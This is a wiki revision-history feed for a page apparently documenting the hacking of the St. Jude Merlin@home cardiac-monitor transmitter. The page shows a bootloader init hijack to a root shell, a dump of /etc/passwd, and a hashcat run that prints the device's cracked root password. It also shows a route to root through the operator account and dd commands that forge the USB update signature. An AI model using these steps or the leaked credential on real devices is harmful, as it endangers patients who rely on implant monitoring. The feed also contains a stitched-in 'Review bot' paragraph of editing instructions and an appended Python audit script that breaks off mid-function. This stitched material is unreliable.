https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&feed=atom&action=history
SJM Merlin at Home - Revision history
2024-03-29T14:13:00Z
Revision history for this page on the wiki
MediaWiki 1.37.2
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2872&oldid=prev
Rjmendez at 19:21, 9 August 2017
2017-08-09T19:21:23Z
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 19:21, 9 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l356">Line 356:</td>
<td colspan="2" class="diff-lineno">Line 356:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>It looks like their pendrive "signature" is fairly easy to get around.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>It looks like their pendrive "signature" is fairly easy to get around.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00116472 s, 2.6 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00116472 s, 2.6 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd /tmp/.sign </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd /tmp/.sign </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 00 00 00 |...|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 00 00 00 |...|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd .sign_mod</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd .sign_mod</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00700994 s, 0.4 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00700994 s, 0.4 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records in</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3+0 records out</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00123249 s, 2.4 kB/s</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>3 bytes copied, 0.00123249 s, 2.4 kB/s</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:~/stjude_merlin$ hd /tmp/.sign </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:~/stjude_merlin$ hd /tmp/.sign </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000000 53 4a 4d |SJM|</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>00000003</pre></div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l380">Line 380:</td>
<td colspan="2" class="diff-lineno">Line 380:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adding the required files to the drive and a small script.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adding the required files to the drive and a small script.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:/media/rjmendez/7A3B-B3C6$ ls -lahR</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><pre>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:/media/rjmendez/7A3B-B3C6$ ls -lahR</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>.:</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>.:</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>total 36K</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>total 36K</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l401">Line 401:</td>
<td colspan="2" class="diff-lineno">Line 401:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<del style="font-weight: bold; text-decoration: none;">Reggie</del>:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>rjmendez@<ins style="font-weight: bold; text-decoration: none;">Rjmendez</ins>:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>#!/bin/sh</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>#!/bin/sh</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>function led_off {</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>function led_off {</div></td></tr>
</table>
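Review bot: In the Line 356 hunk, the write-back command `sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501` passes `bs=1` twice; drop the duplicate so it matches the form of the read-back commands around it. The changed lines in all three hunks (Line 356, Line 380, Line 401) differ only in the prompt hostname, Reggie to Rjmendez, and the revision has no edit summary, so a one-line summary saying that only the prompt hostname changed would make the history easier to follow.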
Rjmendez
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2744&oldid=prev
Zenofex: Zenofex moved page SJM merlin at home to SJM Merlin at Home
2017-08-05T06:36:46Z
<p>Zenofex moved page <a href="/index.php/SJM_merlin_at_home" class="mw-redirect" title="SJM merlin at home">SJM merlin at home</a> to <a href="/index.php/SJM_Merlin_at_Home" title="SJM Merlin at Home">SJM Merlin at Home</a></p>
Zenofex
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2702&oldid=prev
Rjmendez at 01:48, 15 May 2017
2017-05-15T01:48:56Z
Rjmendez
https://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2701&oldid=prev
Rjmendez: SJM Merlin@home model EX1150
2017-05-14T19:20:57Z
<p>SJM Merlin@home model EX1150</p>
<p><b>New page</b></p><div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on UART (3.3 V) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device uses the BLOB bootloader (https://sourceforge.net/projects/blob/) to boot a version of MontaVista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. Interrupting the bootloader's autoboot makes it possible to hijack init by passing init=/bin/sh on the boot command line.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Let's break this.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to log in as root fail. What was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Let's set the password to "test" and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
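The account weaknesses walked through above (a crackable hash in world-readable /etc/passwd, and a locked `operator` account in group 0 with an empty shell field) can be checked for when reviewing a firmware root filesystem. The following Python audit is an added example, not code from the original page; the sample file and its placeholder hash are constructed, and the finding names are this example's own.

```python
import re

# Traditional DES crypt(3): 2 salt chars + 11 hash chars from [./0-9A-Za-z].
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
# Password-field values that carry no hash: locked, or deferred to /etc/shadow.
NO_HASH_MARKERS = {"*", "!", "!!", "x"}

# Constructed sample modelled on the dump above. The root hash is a
# placeholder in descrypt format, not the value from the device.
SAMPLE_PASSWD = """\
root:aaPLACEHOLDER:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
operator:*:12:0:operator:/root:
nobody:*:65534:65534:nobody:/home:/bin/sh
"""


def audit_passwd(text):
    """Return (account, finding) pairs for a passwd(5)-format file."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "MALFORMED"))
            continue
        user, pw, uid, gid, _gecos, _home, shell = fields

        if pw == "":
            findings.append((user, "EMPTY_PASSWORD"))
        elif pw not in NO_HASH_MARKERS and not pw.startswith(("!", "*")):
            # passwd is world-readable, so a hash stored here can be
            # copied off the device and attacked offline.
            findings.append((user, "HASH_IN_PASSWD"))
            if DES_CRYPT_RE.match(pw):
                # descrypt uses only the first 8 password characters
                # and a 12-bit salt.
                findings.append((user, "DES_CRYPT"))

        if user != "root":
            if uid == "0":
                findings.append((user, "UID0_NOT_ROOT"))
            if gid == "0":
                findings.append((user, "GID0_NOT_ROOT"))

        if shell == "":
            # An empty shell field means /bin/sh, so a locked account
            # becomes interactive as soon as its password field changes.
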